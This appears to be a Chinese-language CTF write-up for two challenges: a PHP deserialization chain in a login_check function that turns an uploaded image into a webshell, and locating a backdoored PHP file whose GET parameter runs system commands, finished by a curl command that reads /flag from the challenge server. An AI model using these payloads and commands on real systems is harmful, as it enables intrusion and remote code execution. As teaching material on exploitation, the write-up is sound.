### upload

下载源码 www.tar.gz
发现login_check存在反序列化漏洞
```php
    public function login_check(){
        $profile=cookie('user');
        if(!empty($profile)){
            $this->profile=unserialize(base64_decode($profile));
            $this->profile_db=db('user')->where("ID",intval($this->profile['ID']))->find();
            if(array_diff($this->profile_db,$this->profile)==null){
                return 1;
            }else{
                return 0;
            }
        }
    }
```

首先构造反序列化串：
```php
$profile  = new Profile();
$profile->checker = 0;
$profile->filename = './upload/test.php';
$profile->filename_tmp = './upload/xxxx/xxx.png';
$profile->except = array('index'=>'upload_img');

$register = new Register();
$register->checker = $profile;
$register->registed = 0;
$final = serialize($register);
var_dump($final);
```
大致的调用链是

login_check  ->(register->__destruct) -> (profile->index) -> (profile->_call) -> (profile->_get) -> (profile->_except) -> (profile->upload_img)

最后实现的效果是把一个已经上传的png图片，移动成php文件，直接访问`/upload/test.php` 可获得webshell


### 高明的黑客

思路是通过php报错发现可能的命令执行的地方，如system(\$_GET[xxx]),如果\$_GET[xxx]没有定义，则会返回一个warning。但是原先的代码中是system(\$_GET[xxx] ?? ' ')这样的形式，所以我们要去掉`B ' '`

使用如下命令替换掉`?? ' '`
```shell
find ./ -name "*.php" | xargs sed -i "s/?? ' '//g" 
```

替换完成后，执行所有的php文件，并捕获异常：
```python
#!/usr/bin/env python

import os

dir_name = 'src'

for root, dirs, files in os.walk(dir_name):
        for name in files:
                file_path = os.path.join(root,name)
                print file_path
                os.system('php %s 2>&1 | grep Warning'%file_path)
```

可以发现xk0SzyKwfzw.php爆出system异常，且使用\$_GET Efa5BVG可以控制执行参数。最终可以获取flag：
```
  curl "http://49.4.26.104:31636/xk0SzyKwfzw.php?Efa5BVG=cat%20/flag" | grep flag
  ```
